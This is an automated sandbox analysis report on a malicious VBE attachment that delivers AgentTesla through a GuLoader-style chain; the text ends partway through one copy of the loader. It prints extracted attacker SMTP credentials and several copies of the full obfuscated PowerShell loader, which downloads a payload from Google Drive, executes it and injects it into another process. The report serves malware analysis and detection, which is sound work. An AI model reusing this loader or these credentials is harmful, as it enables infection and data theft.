Analysis
-
max time kernel
142s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2024 18:13
Static task
static1
Behavioral task
behavioral1
Sample
Justificante_13087.vbe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Justificante_13087.vbe
Resource
win10v2004-20240802-en
General
-
Target
Justificante_13087.vbe
-
Size
15KB
-
MD5
59743d96ff1e3796e18c6114bccadcf4
-
SHA1
524a31d5c9d8f25148024aae2cc1e28a8d83a1da
-
SHA256
ee2dea0f5362f6a3410bc8c9f199c740aee91971498aa77ffaf7eb546da7c957
-
SHA512
916ad151f03a72e105c5f2afcdf3ae1ef952d37b069045c2418c050a5d79907ac1e4d32c4b0b0f9ce1d6a0f0d99477fdc8a77b89e717ca7f270919051c3d617f
-
SSDEEP
384:QMVQ3GOmBsxCns4avBwx9ZzEC4FGJujI+PH:K39cs8sQnQC4Tjhf
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 3344 powershell.exe 8 3344 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 3344 powershell.exe 1440 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 5 drive.google.com 6 drive.google.com 25 drive.google.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 api.ipify.org 47 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4284 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1440 powershell.exe 4284 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1440 set thread context of 4284 1440 powershell.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3344 powershell.exe 3344 powershell.exe 1440 powershell.exe 1440 powershell.exe 1440 powershell.exe 4284 wabmig.exe 4284 wabmig.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3344 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 4284 wabmig.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4284 wabmig.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 1624 wrote to memory of 3344 1624 WScript.exe 82 PID 1624 wrote to memory of 3344 1624 WScript.exe 82 PID 3344 wrote to memory of 3224 3344 powershell.exe 84 PID 3344 wrote to memory of 3224 3344 powershell.exe 84 PID 3344 wrote to memory of 2688 3344 powershell.exe 90 PID 3344 wrote to memory of 2688 3344 powershell.exe 90 PID 2688 wrote to memory of 1440 2688 cmd.exe 91 PID 2688 wrote to memory of 1440 2688 cmd.exe 91 PID 2688 wrote to memory of 1440 2688 cmd.exe 91 PID 1440 wrote to memory of 5096 1440 powershell.exe 94 PID 1440 wrote to memory of 5096 1440 powershell.exe 94 PID 1440 wrote to memory of 5096 1440 powershell.exe 94 PID 1440 wrote to memory of 4284 1440 powershell.exe 95 PID 1440 wrote to memory of 4284 1440 powershell.exe 95 PID 1440 wrote to memory of 4284 1440 powershell.exe 95 PID 1440 wrote to memory of 4284 1440 powershell.exe 95 PID 1440 wrote to memory of 4284 1440 powershell.exe 95
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_13087.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udvikle Alderstillgget Oxyaphia Tretrinsraketters Unrepellable #>;$Unhusbandly128='Lgelfters224';<#Cardioid Tautophony Rytterskolers #>;$Slimsvampenendregnede=$host.PrivateData;If ($Slimsvampenendregnede) {$Ecuador++;}function Unencompassed170($hireable){$Sprrerne=$hireable.Length-$Ecuador;for( $Slimsvampene=4;$Slimsvampene -lt $Sprrerne;$Slimsvampene+=5){$Nonconjugality+=$hireable[$Slimsvampene];}$Nonconjugality;}function massively($Flyvermekaniker){ & ($Overproduced) ($Flyvermekaniker);}$Sprdstegte=Unencompassed170 'MelaMPensoTonnz U ciS ndlSkr lMateaUns /Res 5fo,h. B,g0,idd Isoh( nemWPlini UntnGar.dParto,apow.remsGlob FumbNVi.tTPill Fra 1 bom0Skib. J,c0Gasb;Stan ImplWNozziC.man ogs6 ks4 Til;Pter InspxUnex6Res 4.oek;Alat V drInduvMorg: Com1Te n2 ses1Tbru.Inap0Coag)Ryg SlavGPraneAveccDimikDorsoPryg/ Arb2Myoc0Vaeg1 Gab0Dove0Gi c1Arve0di.k1Nihi P.llF KapiApacr,vrmeB.vofInfaoTaksxClub/Hov 1 B.l2 Ath1Mora.Soli0 ,ry ';$Regeringsmagternes=Unencompassed170 'TrolUPavesBe rEPersRKurs-HjemA KlaGzygoE G unRu.dTU,ky ';$Haremets=Unencompassed170 'Justh KistInfotJermpD sts,egr: fr./ ing/Klodd D irEli i F iv Reje Oli.Eighg .rooKompo ArbgUnfelSubsel dy.UniacSprooHandmmuco/,rapuScatcFors?MateeBigbxk mip Slao Perr FritResi=Evand oro wirwLangn ReclRmebo P,aaBra d Uns&BestiSta d,ere=Udst1ScroENeute iseNEng,CAppaLCr sSYout8BundelimnWStaahkant3Tido0 .oeqLiqu2 OutEPresGEngl5beav4Oeno6Teac3,steQBru.Kbullq K poKidaXTilbxGejsDB,adbXyloO S ipKur.ADatacFort ';$Dumper=Unencompassed170 'derb>Imid ';$Overproduced=Unencompassed170 'heliiPolyeNondxI pa ';$Cremationist='Gennemkomponeret';$Efterlignelsernes = Unencompassed170 'TraneKok,cLar hBoomoKl,n Stok%.onaa,linpReckpDustdStana FaatBiocaapp,%Caus\PolyUOvernK.utfJokka,eltsEv.ucCar i D faChaet edePl sdJv h.SoutHRa.do Be.lRupp Skot& ens&Dame AllieprojcCubihCenooindi au,atE tu ';massively (Unencompassed170 'Sup $Hygig osalTopso Rekb Byga Osmlvk,t:SkueIVi.enEmasktimal Anvu FradDewoeBsnirPseui Ti nH,lmg BamsSejl=Krav(Vandc Be mEyold ho Foro/ RepcC dm Jyde$AnmeEsy kf Udtt SubeescrrFirmlGruniTracg ternAme,e A.olRembsMo.te St r.eurnSgene Au sXylo)tegn ');massively (Unencompassed170 'Wine$SouggZooll T koDendbDarwaprovl rin:w.teSVar e Afsl lopfElita Po.dSletjUniqoOrdai,kudn PsytWart=dana$ tipH Mawa MinrGveneAfbrm Asie istganosBifa.Befos Finp aalFucoiVasktKlar( ais$ arcDFodbu SammAfmap W re RecrSo i) nke ');massively (Unencompassed170 ' For[at aN sv.e inct Jos. S.mSProde henr F,gvNonsiFratc piueStroPRateonot,iphthnFiskt Re McotmaSkovn Stra S,rgInvaeHothrenth] Unr:K im:LogiSArase.atic ForuFor.r Anfi Mu tDyndyMe,aPflugrp.stoLsr t orsoPanhcDouboEremlelf Auth= ver Su e[ForsN Se e AnatLive.SoulSIncoeNonfcBemiu unnrSydai unetGithyS efPco.rr brso Ar t SynoS isc BonoBleplStanTAs ryOrnipA bae edr],uav:Mili:synbT WeslPolis Rek1H re2Vigi ');$Haremets=$Selfadjoint[0];$Gonystylaceae= (Unencompassed170 ' Pla$Fa bGorycLFiduOTilkB eelAVe,fL Bir:UnfrrBloce.tagg PonI,phiOD tmNU liAGaulL OctPDuciLFarvASinanG wdLTommG FejNFlseiReb NOxyrG KomS Eur=AlgonBegrE BomWOli -Thioo ,ntbKrreJ TureSta,cWhirTJo r PsorSPe,syUncisSkaktPaasETomeMR,fu. Mu.nRaphE TriT Soi. Gr,w BorECravb isuc KomL acei LecEGll,nAntiT');$Gonystylaceae+=$Inkluderings[1];massively ($Gonystylaceae);massively (Unencompassed170 'T ls$Ba dRIndfeLancg ge,iIsodoAlabnsostatraplFabrpN,vilkontaSteenBranlHapsgLutsnBonhiBa snPo tgDej sOf.e. InsHGarde Ufoa abdUdtoeReflrArbesTr k[Dben$GildRAfsleCrumgTil eCussrTekkiFestnGaffgPrebs AmbmTilkaParagU det ForeCrewrIritnSpeceUndesknog]Live=Inta$GravSafskp UnirTorud Scas Phot DiseToilgKatttBvlee Eso ');$Lurks=Unencompassed170 'Va,r$r spRLokae h vgTempiLii oUig nRorsa rikllabappsyklblybaPeran eol EucgP ranSkrni AffnBroogvi,cs ni. SulDUntaoBondwUndenStorl oloo Ho a estdIrreFMoskiStenl,leue Sig(Weig$SociH HypaHa.erAtomeDes mRubieS mlt Di sMidd,Selv$IncuMRandn Bu.dForbs ge)Isom ';$Mnds=$Inkluderings[0];massively (Unencompassed170 'Kain$ColeGWhicL TraoBarab EngA IdeL rai:StryS,upev HalRForbGGaneeRadi=Mags(BelltO,erESptmS UunTD se-Me.hpAsf.ALandtDepoHPol. Hypo$Bangm a.pNMetaDBepeS ili)Tops ');while (!$svrge) {massively (Unencompassed170 'Safr$BlodgP.thlSu eoBylabCardaYve lHay :OperS estr odmStadr Frek ngeInddrFalbnNepheSublsDril=Haar$AcrotAfbjr foruStvle F r ') ;massively $Lurks;massively (Unencompassed170 'ConsSPri t Briacamer SuptRu.b-Kno,S KomlG,skePa keSa,cpUkva Af.e4Remb ');massively (Unencompassed170 'Creb$Tee g DenlTreaoEli bspecaBli.lExse: MnssResmvLikvrTheogRepae nde= Re.(T ngTSemie chs dbat eut-br nPP,cka SpotIndehAtta .ynd$ nteM,ukknVen,dRevis Ske)Enkl ') ;massively (Unencompassed170 'unen$Un og.ynalmidgo Wicb.opyaBenzlbuck:PoodBBr sl ForaHalsdSativ Fjle,roorMis.dAndeeFamin OvesFrem= Ud,$indigUnful PenoSmaabVej aJebllInco:kla PgloruRisonNighkFyritLorekS,mmoUndimForum ConasaninRef dSndroF.leeNonvnEncosDich+ Mum+Resu% Hre$.iliSStuke t sl Bolf TeraT etdPo ajU.shoRockim,can antGrnt.In,sc Vido reouUskynPerttKlas ') ;$Haremets=$Selfadjoint[$Bladverdens];}$Phonopore=333284;$Udviklingsforlbene=27788;massively (Unencompassed170 'Feri$ PengUnsplPlymo .odbqui a AmplLben:To.sVS,ivi,ppll DebdUredtdobbjM,ljaGuldg,ruitRepr K.ni=Cau. ChalGEquieBesmtGlos-AsteC GjfoAmaln aktUnseePausn P.atE,el Svie$F rfM ensnGraadDe csElse ');massively (Unencompassed170 'snow$ TecgBurbl AbroHumibPreaaBorglC rp:TorsWFirsoKaprvP olenoncn tje Jeh=Ch c R.si[ tueSS umyFrsts Pent kteeSubtm uns.DrvtCAgg oRegunFjelvBl,ne sparCr ntPhot] Yut:Exho:PeelF JoerLvsaoHanemOverB Veda AflsEig eFord6sirp4fundS eictIndur xyqiHeftnUdstg Hex( G,u$He mVCirciTranlUdstdRipptRes,jForpaStatg nontNomi)Anes ');massively (Unencompassed170 ' Kap$ mydgLkkelClitoLumpbTroca SymlBrdf: ParNs ato Teln ladBa deStormgl.saSupenFangdKnigiTheon Oveg.iar Semi=Saba Fram[PaisSSk,tyIn osSu,et mpoeDuodm Ant. pomTRa ie Hebx Tilt er.C piE PlanBa nci loounpadS.geiS,xunxylogNull]J.nn:Beta:.lkeASt nSheteCpoliI amIRumo.Sp.nGDem e Bast PlaSUndmtD,sarVerdi BilnOp fgBark(A,om$PaisWMissoP euvDelrenysan Ti )Yett ');massively (Unencompassed170 ' erk$ThomgWivelbagmoTyrabMas aSjlelDecu: BliTCe av ChaaProln Deag LarsIndofrigsoKandr DidaGo dn ThysEvertStraa UnilChiltAfdenEcsti.lavnDiseg FersDoig=Cern$MellN StaoSpilnTusidOotseF,ilmCa,paBettnChird TeliH ndnS rigUdbi. lusP,atuO erbF its Spit kulrBesniForenLynggAf i( ag$ TabPPharhWanto indnschwoF.repLyseoOsterSurseMakr,Ud,y$ObsoU InsdCentv retiVicekTit lFr pi Ma nStikgY.misActlfRecuoTranrTrollBashb Ci e Su,n RubeTwib)Hver ');massively $Tvangsforanstaltnings;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfasciated.Hol && echo t"3⤵PID:3224
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udvikle Alderstillgget Oxyaphia Tretrinsraketters Unrepellable #>;$Unhusbandly128='Lgelfters224';<#Cardioid Tautophony Rytterskolers #>;$Slimsvampenendregnede=$host.PrivateData;If ($Slimsvampenendregnede) {$Ecuador++;}function Unencompassed170($hireable){$Sprrerne=$hireable.Length-$Ecuador;for( $Slimsvampene=4;$Slimsvampene -lt $Sprrerne;$Slimsvampene+=5){$Nonconjugality+=$hireable[$Slimsvampene];}$Nonconjugality;}function massively($Flyvermekaniker){ & ($Overproduced) ($Flyvermekaniker);}$Sprdstegte=Unencompassed170 'MelaMPensoTonnz U ciS ndlSkr lMateaUns /Res 5fo,h. B,g0,idd Isoh( nemWPlini UntnGar.dParto,apow.remsGlob FumbNVi.tTPill Fra 1 bom0Skib. J,c0Gasb;Stan ImplWNozziC.man ogs6 ks4 Til;Pter InspxUnex6Res 4.oek;Alat V drInduvMorg: Com1Te n2 ses1Tbru.Inap0Coag)Ryg SlavGPraneAveccDimikDorsoPryg/ Arb2Myoc0Vaeg1 Gab0Dove0Gi c1Arve0di.k1Nihi P.llF KapiApacr,vrmeB.vofInfaoTaksxClub/Hov 1 B.l2 Ath1Mora.Soli0 ,ry ';$Regeringsmagternes=Unencompassed170 'TrolUPavesBe rEPersRKurs-HjemA KlaGzygoE G unRu.dTU,ky ';$Haremets=Unencompassed170 'Justh KistInfotJermpD sts,egr: fr./ ing/Klodd D irEli i F iv Reje Oli.Eighg .rooKompo ArbgUnfelSubsel dy.UniacSprooHandmmuco/,rapuScatcFors?MateeBigbxk mip Slao Perr FritResi=Evand oro wirwLangn ReclRmebo P,aaBra d Uns&BestiSta d,ere=Udst1ScroENeute iseNEng,CAppaLCr sSYout8BundelimnWStaahkant3Tido0 .oeqLiqu2 OutEPresGEngl5beav4Oeno6Teac3,steQBru.Kbullq K poKidaXTilbxGejsDB,adbXyloO S ipKur.ADatacFort ';$Dumper=Unencompassed170 'derb>Imid ';$Overproduced=Unencompassed170 'heliiPolyeNondxI pa ';$Cremationist='Gennemkomponeret';$Efterlignelsernes = Unencompassed170 'TraneKok,cLar hBoomoKl,n Stok%.onaa,linpReckpDustdStana FaatBiocaapp,%Caus\PolyUOvernK.utfJokka,eltsEv.ucCar i D faChaet edePl sdJv h.SoutHRa.do Be.lRupp Skot& ens&Dame AllieprojcCubihCenooindi au,atE tu ';massively (Unencompassed170 'Sup $Hygig osalTopso Rekb Byga Osmlvk,t:SkueIVi.enEmasktimal Anvu FradDewoeBsnirPseui Ti nH,lmg BamsSejl=Krav(Vandc Be mEyold ho Foro/ RepcC dm Jyde$AnmeEsy kf Udtt SubeescrrFirmlGruniTracg ternAme,e A.olRembsMo.te St r.eurnSgene Au sXylo)tegn ');massively (Unencompassed170 'Wine$SouggZooll T koDendbDarwaprovl rin:w.teSVar e Afsl lopfElita Po.dSletjUniqoOrdai,kudn PsytWart=dana$ tipH Mawa MinrGveneAfbrm Asie istganosBifa.Befos Finp aalFucoiVasktKlar( ais$ arcDFodbu SammAfmap W re RecrSo i) nke ');massively (Unencompassed170 ' For[at aN sv.e inct Jos. S.mSProde henr F,gvNonsiFratc piueStroPRateonot,iphthnFiskt Re McotmaSkovn Stra S,rgInvaeHothrenth] Unr:K im:LogiSArase.atic ForuFor.r Anfi Mu tDyndyMe,aPflugrp.stoLsr t orsoPanhcDouboEremlelf Auth= ver Su e[ForsN Se e AnatLive.SoulSIncoeNonfcBemiu unnrSydai unetGithyS efPco.rr brso Ar t SynoS isc BonoBleplStanTAs ryOrnipA bae edr],uav:Mili:synbT WeslPolis Rek1H re2Vigi ');$Haremets=$Selfadjoint[0];$Gonystylaceae= (Unencompassed170 ' Pla$Fa bGorycLFiduOTilkB eelAVe,fL Bir:UnfrrBloce.tagg PonI,phiOD tmNU liAGaulL OctPDuciLFarvASinanG wdLTommG FejNFlseiReb NOxyrG KomS Eur=AlgonBegrE BomWOli -Thioo ,ntbKrreJ TureSta,cWhirTJo r PsorSPe,syUncisSkaktPaasETomeMR,fu. Mu.nRaphE TriT Soi. Gr,w BorECravb isuc KomL acei LecEGll,nAntiT');$Gonystylaceae+=$Inkluderings[1];massively ($Gonystylaceae);massively (Unencompassed170 'T ls$Ba dRIndfeLancg ge,iIsodoAlabnsostatraplFabrpN,vilkontaSteenBranlHapsgLutsnBonhiBa snPo tgDej sOf.e. InsHGarde Ufoa abdUdtoeReflrArbesTr k[Dben$GildRAfsleCrumgTil eCussrTekkiFestnGaffgPrebs AmbmTilkaParagU det ForeCrewrIritnSpeceUndesknog]Live=Inta$GravSafskp UnirTorud Scas Phot DiseToilgKatttBvlee Eso ');$Lurks=Unencompassed170 'Va,r$r spRLokae h vgTempiLii oUig nRorsa rikllabappsyklblybaPeran eol EucgP ranSkrni AffnBroogvi,cs ni. SulDUntaoBondwUndenStorl oloo Ho a estdIrreFMoskiStenl,leue Sig(Weig$SociH HypaHa.erAtomeDes mRubieS mlt Di sMidd,Selv$IncuMRandn Bu.dForbs ge)Isom ';$Mnds=$Inkluderings[0];massively (Unencompassed170 'Kain$ColeGWhicL TraoBarab EngA IdeL rai:StryS,upev HalRForbGGaneeRadi=Mags(BelltO,erESptmS UunTD se-Me.hpAsf.ALandtDepoHPol. Hypo$Bangm a.pNMetaDBepeS ili)Tops ');while (!$svrge) {massively (Unencompassed170 'Safr$BlodgP.thlSu eoBylabCardaYve lHay :OperS estr odmStadr Frek ngeInddrFalbnNepheSublsDril=Haar$AcrotAfbjr foruStvle F r ') ;massively $Lurks;massively (Unencompassed170 'ConsSPri t Briacamer SuptRu.b-Kno,S KomlG,skePa keSa,cpUkva Af.e4Remb ');massively (Unencompassed170 'Creb$Tee g DenlTreaoEli bspecaBli.lExse: MnssResmvLikvrTheogRepae nde= Re.(T ngTSemie chs dbat eut-br nPP,cka SpotIndehAtta .ynd$ nteM,ukknVen,dRevis Ske)Enkl ') ;massively (Unencompassed170 'unen$Un og.ynalmidgo Wicb.opyaBenzlbuck:PoodBBr sl ForaHalsdSativ Fjle,roorMis.dAndeeFamin OvesFrem= Ud,$indigUnful PenoSmaabVej aJebllInco:kla PgloruRisonNighkFyritLorekS,mmoUndimForum ConasaninRef dSndroF.leeNonvnEncosDich+ Mum+Resu% Hre$.iliSStuke t sl Bolf TeraT etdPo ajU.shoRockim,can antGrnt.In,sc Vido reouUskynPerttKlas ') ;$Haremets=$Selfadjoint[$Bladverdens];}$Phonopore=333284;$Udviklingsforlbene=27788;massively (Unencompassed170 'Feri$ PengUnsplPlymo .odbqui a AmplLben:To.sVS,ivi,ppll DebdUredtdobbjM,ljaGuldg,ruitRepr K.ni=Cau. ChalGEquieBesmtGlos-AsteC GjfoAmaln aktUnseePausn P.atE,el Svie$F rfM ensnGraadDe csElse ');massively (Unencompassed170 'snow$ TecgBurbl AbroHumibPreaaBorglC rp:TorsWFirsoKaprvP olenoncn tje Jeh=Ch c R.si[ tueSS umyFrsts Pent kteeSubtm uns.DrvtCAgg oRegunFjelvBl,ne sparCr ntPhot] Yut:Exho:PeelF JoerLvsaoHanemOverB Veda AflsEig eFord6sirp4fundS eictIndur xyqiHeftnUdstg Hex( G,u$He mVCirciTranlUdstdRipptRes,jForpaStatg nontNomi)Anes ');massively (Unencompassed170 ' Kap$ mydgLkkelClitoLumpbTroca SymlBrdf: ParNs ato Teln ladBa deStormgl.saSupenFangdKnigiTheon Oveg.iar Semi=Saba Fram[PaisSSk,tyIn osSu,et mpoeDuodm Ant. pomTRa ie Hebx Tilt er.C piE PlanBa nci loounpadS.geiS,xunxylogNull]J.nn:Beta:.lkeASt nSheteCpoliI amIRumo.Sp.nGDem e Bast PlaSUndmtD,sarVerdi BilnOp fgBark(A,om$PaisWMissoP euvDelrenysan Ti )Yett ');massively (Unencompassed170 ' erk$ThomgWivelbagmoTyrabMas aSjlelDecu: BliTCe av ChaaProln Deag LarsIndofrigsoKandr DidaGo dn ThysEvertStraa UnilChiltAfdenEcsti.lavnDiseg FersDoig=Cern$MellN StaoSpilnTusidOotseF,ilmCa,paBettnChird TeliH ndnS rigUdbi. lusP,atuO erbF its Spit kulrBesniForenLynggAf i( ag$ TabPPharhWanto indnschwoF.repLyseoOsterSurseMakr,Ud,y$ObsoU InsdCentv retiVicekTit lFr pi Ma nStikgY.misActlfRecuoTranrTrollBashb Ci e Su,n RubeTwib)Hver ');massively $Tvangsforanstaltnings;"3⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udvikle Alderstillgget Oxyaphia Tretrinsraketters Unrepellable #>;$Unhusbandly128='Lgelfters224';<#Cardioid Tautophony Rytterskolers #>;$Slimsvampenendregnede=$host.PrivateData;If ($Slimsvampenendregnede) {$Ecuador++;}function Unencompassed170($hireable){$Sprrerne=$hireable.Length-$Ecuador;for( $Slimsvampene=4;$Slimsvampene -lt $Sprrerne;$Slimsvampene+=5){$Nonconjugality+=$hireable[$Slimsvampene];}$Nonconjugality;}function massively($Flyvermekaniker){ & ($Overproduced) ($Flyvermekaniker);}$Sprdstegte=Unencompassed170 'MelaMPensoTonnz U ciS ndlSkr lMateaUns /Res 5fo,h. B,g0,idd Isoh( nemWPlini UntnGar.dParto,apow.remsGlob FumbNVi.tTPill Fra 1 bom0Skib. J,c0Gasb;Stan ImplWNozziC.man ogs6 ks4 Til;Pter InspxUnex6Res 4.oek;Alat V drInduvMorg: Com1Te n2 ses1Tbru.Inap0Coag)Ryg SlavGPraneAveccDimikDorsoPryg/ Arb2Myoc0Vaeg1 Gab0Dove0Gi c1Arve0di.k1Nihi P.llF KapiApacr,vrmeB.vofInfaoTaksxClub/Hov 1 B.l2 Ath1Mora.Soli0 ,ry ';$Regeringsmagternes=Unencompassed170 'TrolUPavesBe rEPersRKurs-HjemA KlaGzygoE G unRu.dTU,ky ';$Haremets=Unencompassed170 'Justh KistInfotJermpD sts,egr: fr./ ing/Klodd D irEli i F iv Reje Oli.Eighg .rooKompo ArbgUnfelSubsel dy.UniacSprooHandmmuco/,rapuScatcFors?MateeBigbxk mip Slao Perr FritResi=Evand oro wirwLangn ReclRmebo P,aaBra d Uns&BestiSta d,ere=Udst1ScroENeute iseNEng,CAppaLCr sSYout8BundelimnWStaahkant3Tido0 .oeqLiqu2 OutEPresGEngl5beav4Oeno6Teac3,steQBru.Kbullq K poKidaXTilbxGejsDB,adbXyloO S ipKur.ADatacFort ';$Dumper=Unencompassed170 'derb>Imid ';$Overproduced=Unencompassed170 'heliiPolyeNondxI pa ';$Cremationist='Gennemkomponeret';$Efterlignelsernes = Unencompassed170 'TraneKok,cLar hBoomoKl,n Stok%.onaa,linpReckpDustdStana FaatBiocaapp,%Caus\PolyUOvernK.utfJokka,eltsEv.ucCar i D faChaet edePl sdJv h.SoutHRa.do Be.lRupp Skot& ens&Dame AllieprojcCubihCenooindi au,atE tu ';massively (Unencompassed170 'Sup $Hygig osalTopso Rekb Byga Osmlvk,t:SkueIVi.enEmasktimal Anvu FradDewoeBsnirPseui Ti nH,lmg BamsSejl=Krav(Vandc Be mEyold ho Foro/ RepcC dm Jyde$AnmeEsy kf Udtt SubeescrrFirmlGruniTracg ternAme,e A.olRembsMo.te St r.eurnSgene Au sXylo)tegn ');massively (Unencompassed170 'Wine$SouggZooll T koDendbDarwaprovl rin:w.teSVar e Afsl lopfElita Po.dSletjUniqoOrdai,kudn PsytWart=dana$ tipH Mawa MinrGveneAfbrm Asie istganosBifa.Befos Finp aalFucoiVasktKlar( ais$ arcDFodbu SammAfmap W re RecrSo i) nke ');massively (Unencompassed170 ' For[at aN sv.e inct Jos. S.mSProde henr F,gvNonsiFratc piueStroPRateonot,iphthnFiskt Re McotmaSkovn Stra S,rgInvaeHothrenth] Unr:K im:LogiSArase.atic ForuFor.r Anfi Mu tDyndyMe,aPflugrp.stoLsr t orsoPanhcDouboEremlelf Auth= ver Su e[ForsN Se e AnatLive.SoulSIncoeNonfcBemiu unnrSydai unetGithyS efPco.rr brso Ar t SynoS isc BonoBleplStanTAs ryOrnipA bae edr],uav:Mili:synbT WeslPolis Rek1H re2Vigi ');$Haremets=$Selfadjoint[0];$Gonystylaceae= (Unencompassed170 ' Pla$Fa bGorycLFiduOTilkB eelAVe,fL Bir:UnfrrBloce.tagg PonI,phiOD tmNU liAGaulL OctPDuciLFarvASinanG wdLTommG FejNFlseiReb NOxyrG KomS Eur=AlgonBegrE BomWOli -Thioo ,ntbKrreJ TureSta,cWhirTJo r PsorSPe,syUncisSkaktPaasETomeMR,fu. Mu.nRaphE TriT Soi. Gr,w BorECravb isuc KomL acei LecEGll,nAntiT');$Gonystylaceae+=$Inkluderings[1];massively ($Gonystylaceae);massively (Unencompassed170 'T ls$Ba dRIndfeLancg ge,iIsodoAlabnsostatraplFabrpN,vilkontaSteenBranlHapsgLutsnBonhiBa snPo tgDej sOf.e. InsHGarde Ufoa abdUdtoeReflrArbesTr k[Dben$GildRAfsleCrumgTil eCussrTekkiFestnGaffgPrebs AmbmTilkaParagU det ForeCrewrIritnSpeceUndesknog]Live=Inta$GravSafskp UnirTorud Scas Phot DiseToilgKatttBvlee Eso ');$Lurks=Unencompassed170 'Va,r$r spRLokae h vgTempiLii oUig nRorsa rikllabappsyklblybaPeran eol EucgP ranSkrni AffnBroogvi,cs ni. SulDUntaoBondwUndenStorl oloo Ho a estdIrreFMoskiStenl,leue Sig(Weig$SociH HypaHa.erAtomeDes mRubieS mlt Di sMidd,Selv$IncuMRandn Bu.dForbs ge)Isom ';$Mnds=$Inkluderings[0];massively (Unencompassed170 'Kain$ColeGWhicL TraoBarab EngA IdeL rai:StryS,upev HalRForbGGaneeRadi=Mags(BelltO,erESptmS UunTD se-Me.hpAsf.ALandtDepoHPol. Hypo$Bangm a.pNMetaDBepeS ili)Tops ');while (!$svrge) {massively (Unencompassed170 'Safr$BlodgP.thlSu eoBylabCardaYve lHay :OperS estr odmStadr Frek ngeInddrFalbnNepheSublsDril=Haar$AcrotAfbjr foruStvle F r ') ;massively $Lurks;massively (Unencompassed170 'ConsSPri t Briacamer SuptRu.b-Kno,S KomlG,skePa keSa,cpUkva Af.e4Remb ');massively (Unencompassed170 'Creb$Tee g DenlTreaoEli bspecaBli.lExse: MnssResmvLikvrTheogRepae nde= Re.(T ngTSemie chs dbat eut-br nPP,cka SpotIndehAtta .ynd$ nteM,ukknVen,dRevis Ske)Enkl ') ;massively (Unencompassed170 'unen$Un og.ynalmidgo Wicb.opyaBenzlbuck:PoodBBr sl ForaHalsdSativ Fjle,roorMis.dAndeeFamin OvesFrem= Ud,$indigUnful PenoSmaabVej aJebllInco:kla PgloruRisonNighkFyritLorekS,mmoUndimForum ConasaninRef dSndroF.leeNonvnEncosDich+ Mum+Resu% Hre$.iliSStuke t sl Bolf TeraT etdPo ajU.shoRockim,can antGrnt.In,sc Vido reouUskynPerttKlas ') ;$Haremets=$Selfadjoint[$Bladverdens];}$Phonopore=333284;$Udviklingsforlbene=27788;massively (Unencompassed170 'Feri$ PengUnsplPlymo .odbqui a AmplLben:To.sVS,ivi,ppll DebdUredtdobbjM,ljaGuldg,ruitRepr K.ni=Cau. ChalGEquieBesmtGlos-AsteC GjfoAmaln aktUnseePausn P.atE,el Svie$F rfM ensnGraadDe csElse ');massively (Unencompassed170 'snow$ TecgBurbl AbroHumibPreaaBorglC rp:TorsWFirsoKaprvP olenoncn tje Jeh=Ch c R.si[ tueSS umyFrsts Pent kteeSubtm uns.DrvtCAgg oRegunFjelvBl,ne sparCr ntPhot] Yut:Exho:PeelF JoerLvsaoHanemOverB Veda AflsEig eFord6sirp4fundS eictIndur xyqiHeftnUdstg Hex( G,u$He mVCirciTranlUdstdRipptRes,jForpaStatg nontNomi)Anes ');massively (Unencompassed170 ' Kap$ mydgLkkelClitoLumpbTroca SymlBrdf: ParNs ato Teln ladBa deStormgl.saSupenFangdKnigiTheon Oveg.iar Semi=Saba Fram[PaisSSk,tyIn osSu,et mpoeDuodm Ant. pomTRa ie Hebx 